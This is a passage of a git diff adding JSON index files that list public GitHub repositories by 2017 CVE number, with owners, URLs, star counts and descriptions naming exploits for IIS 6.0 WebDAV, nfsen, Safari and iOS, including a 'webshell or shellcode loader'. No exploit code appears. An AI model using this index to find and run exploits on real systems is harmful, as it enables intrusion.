CVE-2017-5715)", + "fork": false, + "created_at": "2018-01-17T17:26:14Z", + "updated_at": "2022-09-20T07:16:36Z", + "pushed_at": "2018-01-23T19:54:07Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 118516301, + "name": "CiscoIOSSNMPToolkit", + "full_name": "GarnetSunset\/CiscoIOSSNMPToolkit", + "owner": { + "login": "GarnetSunset", + "id": 13430434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13430434?v=4", + "html_url": "https:\/\/github.com\/GarnetSunset", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GarnetSunset\/CiscoIOSSNMPToolkit", + "description": "Cisco iOS SNMP Overflow Exploit Toolkit (CVE-2017-6736)", + "fork": false, + "created_at": "2018-01-22T21:15:43Z", + "updated_at": "2023-02-17T08:45:25Z", + "pushed_at": "2018-06-28T18:56:25Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6913.json b/2017/CVE-2017-6913.json new file mode 100644 index 0000000000..93270233f2 --- /dev/null +++ b/2017/CVE-2017-6913.json @@ -0,0 +1,33 @@ +[ + { + "id": 148588561, + "name": "CVE-2017-6913", + "full_name": "gquere\/CVE-2017-6913", + "owner": { + "login": "gquere", + "id": 1585000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1585000?v=4", + "html_url": "https:\/\/github.com\/gquere", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gquere\/CVE-2017-6913", + "description": "Details about CVE-2017-6913 - Stored XSS in open-xchange's webmail", + "fork": false, + "created_at": "2018-09-13T05:51:59Z", + "updated_at": "2020-03-17T12:39:10Z", + "pushed_at": "2018-09-13T06:31:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6971.json b/2017/CVE-2017-6971.json new file mode 100644 index 0000000000..7574e63dac --- /dev/null +++ b/2017/CVE-2017-6971.json @@ -0,0 +1,64 @@ +[ + { + "id": 87749039, + "name": "nfsen-exploit", + "full_name": "patrickfreed\/nfsen-exploit", + "owner": { + "login": "patrickfreed", + "id": 936020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/936020?v=4", + "html_url": "https:\/\/github.com\/patrickfreed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickfreed\/nfsen-exploit", + "description": "Exploit for CVE-2017-6971 remote command execution in nfsen 1.3.7.", + "fork": false, + "created_at": "2017-04-10T00:13:24Z", + "updated_at": "2024-08-12T19:28:59Z", + "pushed_at": "2017-04-10T16:06:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 183134145, + "name": "nfsen_1.3.7_CVE-2017-6971", + "full_name": "KeyStrOke95\/nfsen_1.3.7_CVE-2017-6971", + "owner": { + "login": "KeyStrOke95", + "id": 12446252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12446252?v=4", + "html_url": "https:\/\/github.com\/KeyStrOke95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KeyStrOke95\/nfsen_1.3.7_CVE-2017-6971", + "description": null, + "fork": false, + "created_at": "2019-04-24T02:45:17Z", + "updated_at": "2019-04-24T02:54:21Z", + "pushed_at": "2019-04-24T02:54:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7038.json b/2017/CVE-2017-7038.json new file mode 100644 index 0000000000..f04db19ee8 --- /dev/null +++ b/2017/CVE-2017-7038.json @@ -0,0 +1,40 @@ +[ + { + "id": 113333614, + "name": "CVE-2017-7038", + "full_name": "ansjdnakjdnajkd\/CVE-2017-7038", + "owner": { + "login": "ansjdnakjdnajkd", + "id": 1408055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1408055?v=4", + "html_url": "https:\/\/github.com\/ansjdnakjdnajkd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ansjdnakjdnajkd\/CVE-2017-7038", + "description": "Safari XSS (CVE-2017-7038) https:\/\/support.apple.com\/en-us\/HT207923", + "fork": false, + "created_at": "2017-12-06T15:31:08Z", + "updated_at": "2024-08-12T19:34:35Z", + "pushed_at": "2017-12-06T15:41:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apple", + "js", + "safari", + "vulnerability", + "webkit", + "xss" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7047.json b/2017/CVE-2017-7047.json new file mode 100644 index 0000000000..4dd28afab0 --- /dev/null +++ b/2017/CVE-2017-7047.json @@ -0,0 +1,64 @@ +[ + { + "id": 99396176, + "name": "Triple_Fetch-Kernel-Creds", + "full_name": "JosephShenton\/Triple_Fetch-Kernel-Creds", + "owner": { + "login": "JosephShenton", + "id": 12966231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12966231?v=4", + "html_url": "https:\/\/github.com\/JosephShenton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JosephShenton\/Triple_Fetch-Kernel-Creds", + "description": "Attempt to steal kernelcredentials from launchd + task_t pointer (Based on: CVE-2017-7047)", + "fork": false, + "created_at": "2017-08-05T03:23:13Z", + "updated_at": "2023-08-06T08:28:37Z", + "pushed_at": "2017-08-05T09:21:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 99915573, + "name": "Triple_fetch", + "full_name": "q1f3\/Triple_fetch", + "owner": { + "login": "q1f3", + "id": 9603950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9603950?v=4", + "html_url": "https:\/\/github.com\/q1f3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/q1f3\/Triple_fetch", + "description": "This is an exploit for CVE-2017-7047, Works on 10.3.2 and below.", + "fork": false, + "created_at": "2017-08-10T11:24:47Z", + "updated_at": "2024-08-12T19:31:54Z", + "pushed_at": "2017-08-03T23:47:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7089.json b/2017/CVE-2017-7089.json new file mode 100644 index 0000000000..ec664cdd7e --- /dev/null +++ b/2017/CVE-2017-7089.json @@ -0,0 +1,64 @@ +[ + { + "id": 105647741, + "name": "CVE-2017-7089", + "full_name": "Bo0oM\/CVE-2017-7089", + "owner": { + "login": "Bo0oM", + "id": 3492361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3492361?v=4", + "html_url": "https:\/\/github.com\/Bo0oM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bo0oM\/CVE-2017-7089", + "description": "Webkit uxss exploit (CVE-2017-7089)", + "fork": false, + "created_at": "2017-10-03T12:13:43Z", + "updated_at": "2024-08-12T19:33:02Z", + "pushed_at": "2017-10-03T12:23:43Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 64, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 106570313, + "name": "Safari_Mac", + "full_name": "aymankhalfatni\/Safari_Mac", + "owner": { + "login": "aymankhalfatni", + "id": 19715320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19715320?v=4", + "html_url": "https:\/\/github.com\/aymankhalfatni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aymankhalfatni\/Safari_Mac", + "description": "Exploit Safari CVE-2017-7089", + "fork": false, + "created_at": "2017-10-11T15:09:45Z", + "updated_at": "2024-08-12T19:33:12Z", + "pushed_at": "2017-10-11T15:10:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7092.json b/2017/CVE-2017-7092.json new file mode 100644 index 0000000000..7389260cad --- /dev/null +++ b/2017/CVE-2017-7092.json @@ -0,0 +1,33 @@ +[ + { + "id": 104834843, + "name": "CVE-2017-7092-PoC", + "full_name": "xuechiyaobai\/CVE-2017-7092-PoC", + "owner": { + "login": "xuechiyaobai", + "id": 8443947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8443947?v=4", + "html_url": "https:\/\/github.com\/xuechiyaobai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xuechiyaobai\/CVE-2017-7092-PoC", + "description": "This is the Pwn2Own 2017 Safari backup vul's exploit.", + "fork": false, + "created_at": "2017-09-26T04:10:32Z", + "updated_at": "2024-08-12T19:32:53Z", + "pushed_at": "2019-03-25T02:38:06Z", + "stargazers_count": 115, + "watchers_count": 115, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 115, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7173.json b/2017/CVE-2017-7173.json new file mode 100644 index 0000000000..3330fb2b5f --- /dev/null +++ b/2017/CVE-2017-7173.json @@ -0,0 +1,33 @@ +[ + { + "id": 104429992, + "name": "sysctl_coalition_get_pid_list-dos", + "full_name": "bazad\/sysctl_coalition_get_pid_list-dos", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/sysctl_coalition_get_pid_list-dos", + "description": "CVE-2017-7173: Local denial of service for iOS requiring root privileges.", + "fork": false, + "created_at": "2017-09-22T04:04:05Z", + "updated_at": "2024-08-12T19:32:48Z", + "pushed_at": "2018-01-17T19:19:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7184.json b/2017/CVE-2017-7184.json new file mode 100644 index 0000000000..25af297785 --- /dev/null +++ b/2017/CVE-2017-7184.json @@ -0,0 +1,64 @@ +[ + { + "id": 118847628, + "name": "cve-2017-7184", + "full_name": "rockl\/cve-2017-7184", + "owner": { + "login": "rockl", + "id": 2081161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2081161?v=4", + "html_url": "https:\/\/github.com\/rockl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockl\/cve-2017-7184", + "description": " the job is not yet finished", + "fork": false, + "created_at": "2018-01-25T01:55:47Z", + "updated_at": "2018-01-25T01:55:47Z", + "pushed_at": "2018-01-25T01:55:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 118849076, + "name": "cve-2017-7184-bak", + "full_name": "rockl\/cve-2017-7184-bak", + "owner": { + "login": "rockl", + "id": 2081161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2081161?v=4", + "html_url": "https:\/\/github.com\/rockl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockl\/cve-2017-7184-bak", + "description": "not yet fin", + "fork": false, + "created_at": "2018-01-25T02:10:45Z", + "updated_at": "2018-01-25T02:10:45Z", + "pushed_at": "2018-01-25T02:10:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7188.json b/2017/CVE-2017-7188.json new file mode 100644 index 0000000000..f9f56c1ef5 --- /dev/null +++ b/2017/CVE-2017-7188.json @@ -0,0 +1,33 @@ +[ + { + "id": 87800336, + "name": "Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC", + "full_name": "faizzaidi\/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC", + "owner": { + "login": "faizzaidi", + "id": 12153050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12153050?v=4", + "html_url": "https:\/\/github.com\/faizzaidi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faizzaidi\/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC", + "description": "Zurmo-Stable-3.1.1 Cross Site Scripting (XSS) Assigned CVE Number: CVE-2017-7188", + "fork": false, + "created_at": "2017-04-10T10:52:13Z", + "updated_at": "2020-07-17T05:22:49Z", + "pushed_at": "2017-04-10T10:52:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7269.json b/2017/CVE-2017-7269.json new file mode 100644 index 0000000000..617c28e9c3 --- /dev/null +++ b/2017/CVE-2017-7269.json @@ -0,0 +1,665 @@ +[ + { + "id": 86543900, + "name": "webdav_exploit", + "full_name": "eliuha\/webdav_exploit", + "owner": { + "login": "eliuha", + "id": 2240516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2240516?v=4", + "html_url": "https:\/\/github.com\/eliuha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eliuha\/webdav_exploit", + "description": "An exploit for Microsoft IIS 6.0 CVE-2017-7269", + "fork": false, + "created_at": "2017-03-29T05:59:30Z", + "updated_at": "2024-09-24T22:25:55Z", + "pushed_at": "2017-03-29T07:26:41Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-7269", + "iis", + "propfind", + "storagepathfromurl" + ], + "visibility": "public", + "forks": 21, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 86573461, + "name": "CVE-2017-7269-Echo-PoC", + "full_name": "lcatro\/CVE-2017-7269-Echo-PoC", + "owner": { + "login": "lcatro", + "id": 10431717, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10431717?v=4", + "html_url": "https:\/\/github.com\/lcatro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lcatro\/CVE-2017-7269-Echo-PoC", + "description": "CVE-2017-7269 回显PoC ,用于远程漏洞检测..", + "fork": false, + "created_at": "2017-03-29T11:20:19Z", + "updated_at": "2024-08-12T19:28:45Z", + "pushed_at": "2018-10-27T03:20:05Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 39, + "watchers": 87, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 86581754, + "name": "CVE-2017-7269-exploit", + "full_name": "caicai1355\/CVE-2017-7269-exploit", + "owner": { + "login": "caicai1355", + "id": 24385053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24385053?v=4", + "html_url": "https:\/\/github.com\/caicai1355", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/caicai1355\/CVE-2017-7269-exploit", + "description": "exec 8 bytes command", + "fork": false, + "created_at": "2017-03-29T12:52:54Z", + "updated_at": "2024-08-12T19:28:45Z", + "pushed_at": "2017-03-29T13:08:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 86659284, + "name": "CVE-2017-7269", + "full_name": "M1a0rz\/CVE-2017-7269", + "owner": { + "login": "M1a0rz", + "id": 25101765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25101765?v=4", + "html_url": "https:\/\/github.com\/M1a0rz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M1a0rz\/CVE-2017-7269", + "description": "Poc for iis6.0", + "fork": false, + "created_at": "2017-03-30T04:35:13Z", + "updated_at": "2017-03-30T04:35:13Z", + "pushed_at": "2017-03-30T04:35:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 86697845, + "name": "cve-2017-7269picture", + "full_name": "whiteHat001\/cve-2017-7269picture", + "owner": { + "login": "whiteHat001", + "id": 18191034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18191034?v=4", + "html_url": "https:\/\/github.com\/whiteHat001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whiteHat001\/cve-2017-7269picture", + "description": null, + "fork": false, + "created_at": "2017-03-30T12:03:05Z", + "updated_at": "2017-03-30T12:03:05Z", + "pushed_at": "2017-03-30T12:11:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 86754251, + "name": "cve-2017-7269", + "full_name": "zcgonvh\/cve-2017-7269", + "owner": { + "login": "zcgonvh", + "id": 25787677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25787677?v=4", + "html_url": "https:\/\/github.com\/zcgonvh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcgonvh\/cve-2017-7269", + "description": "fixed msf module for cve-2017-7269", + "fork": false, + "created_at": "2017-03-30T22:20:36Z", + "updated_at": "2024-11-13T06:36:25Z", + "pushed_at": "2017-03-30T22:20:51Z", + "stargazers_count": 135, + "watchers_count": 135, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 135, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 87365181, + "name": "iis6-exploit-2017-CVE-2017-7269", + "full_name": "g0rx\/iis6-exploit-2017-CVE-2017-7269", + "owner": { + "login": "g0rx", + "id": 10961397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10961397?v=4", + "html_url": "https:\/\/github.com\/g0rx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g0rx\/iis6-exploit-2017-CVE-2017-7269", + "description": "iis6 exploit 2017 CVE-2017-7269", + "fork": false, + "created_at": "2017-04-05T23:21:12Z", + "updated_at": "2024-11-18T05:25:32Z", + "pushed_at": "2023-02-04T09:09:35Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 55, + "watchers": 87, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 87432387, + "name": "IIS_6.0_WebDAV_Ruby", + "full_name": "slimpagey\/IIS_6.0_WebDAV_Ruby", + "owner": { + "login": "slimpagey", + "id": 10183644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10183644?v=4", + "html_url": "https:\/\/github.com\/slimpagey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/slimpagey\/IIS_6.0_WebDAV_Ruby", + "description": "Ruby Exploit for IIS 6.0 Buffer Overflow (CVE-2017-7269)", + "fork": false, + "created_at": "2017-04-06T13:27:20Z", + "updated_at": "2024-08-12T19:28:55Z", + "pushed_at": "2017-04-06T13:47:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 88148249, + "name": "cve-2017-7269", + "full_name": "homjxi0e\/cve-2017-7269", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/cve-2017-7269", + "description": null, + "fork": false, + "created_at": "2017-04-13T09:27:01Z", + "updated_at": "2017-04-13T09:27:01Z", + "pushed_at": "2017-04-13T12:33:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 89217126, + "name": "CVE-2017-7269", + "full_name": "xiaovpn\/CVE-2017-7269", + "owner": { + "login": "xiaovpn", + "id": 22736797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22736797?v=4", + "html_url": "https:\/\/github.com\/xiaovpn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaovpn\/CVE-2017-7269", + "description": "CVE-2017-7269", + "fork": false, + "created_at": "2017-04-24T08:42:59Z", + "updated_at": "2017-04-24T08:42:59Z", + "pushed_at": "2017-04-24T08:43:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 91493002, + "name": "cve-2017-7269-tool", + "full_name": "zcgonvh\/cve-2017-7269-tool", + "owner": { + "login": "zcgonvh", + "id": 25787677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25787677?v=4", + "html_url": "https:\/\/github.com\/zcgonvh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcgonvh\/cve-2017-7269-tool", + "description": "CVE-2017-7269 to webshell or shellcode loader", + "fork": false, + "created_at": "2017-05-16T18:47:45Z", + "updated_at": "2024-10-24T10:24:32Z", + "pushed_at": "2017-05-16T18:48:15Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 87, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 118708741, + "name": "CVE-2017-7269", + "full_name": "mirrorblack\/CVE-2017-7269", + "owner": { + "login": "mirrorblack", + "id": 33338951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33338951?v=4", + "html_url": "https:\/\/github.com\/mirrorblack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mirrorblack\/CVE-2017-7269", + "description": "CVE-2017-7269利用代码(rb文件)", + "fork": false, + "created_at": "2018-01-24T03:51:58Z", + "updated_at": "2018-01-24T03:51:58Z", + "pushed_at": "2018-01-24T03:51:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 131371800, + "name": "CVE-2017-7269", + "full_name": "Al1ex\/CVE-2017-7269", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2017-7269", + "description": null, + "fork": false, + "created_at": "2018-04-28T04:11:45Z", + "updated_at": "2024-08-12T19:38:07Z", + "pushed_at": "2018-04-28T04:47:05Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 201442014, + "name": "CVE-2017-7269", + "full_name": "ThanHuuTuan\/CVE-2017-7269", + "owner": { + "login": "ThanHuuTuan", + "id": 32167814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4", + "html_url": "https:\/\/github.com\/ThanHuuTuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThanHuuTuan\/CVE-2017-7269", + "description": null, + "fork": false, + "created_at": "2019-08-09T10:01:50Z", + "updated_at": "2019-08-09T10:01:53Z", + "pushed_at": "2017-04-04T17:20:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 386542444, + "name": "CVE-2017-7269", + "full_name": "n3rdh4x0r\/CVE-2017-7269", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2017-7269", + "description": null, + "fork": false, + "created_at": "2021-07-16T07:02:27Z", + "updated_at": "2024-01-13T04:37:00Z", + "pushed_at": "2021-07-16T07:04:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530002521, + "name": "CVE-2017-7269_Python3", + "full_name": "denchief1\/CVE-2017-7269_Python3", + "owner": { + "login": "denchief1", + "id": 5113191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5113191?v=4", + "html_url": "https:\/\/github.com\/denchief1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/denchief1\/CVE-2017-7269_Python3", + "description": "CVE-2017-7269 implemented in python3", + "fork": false, + "created_at": "2022-08-28T23:14:02Z", + "updated_at": "2022-08-28T23:14:02Z", + "pushed_at": "2022-08-28T23:14:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530047426, + "name": "CVE-2017-7269", + "full_name": "denchief1\/CVE-2017-7269", + "owner": { + "login": "denchief1", + "id": 5113191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5113191?v=4", + "html_url": "https:\/\/github.com\/denchief1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/denchief1\/CVE-2017-7269", + "description": "CVE-2017-7269 implemented in C#", + "fork": false, + "created_at": "2022-08-29T03:05:06Z", + "updated_at": "2022-08-29T03:05:06Z", + "pushed_at": "2022-08-29T03:05:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802854763, + "name": "CVE-2017-7269", + "full_name": "Cappricio-Securities\/CVE-2017-7269", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + 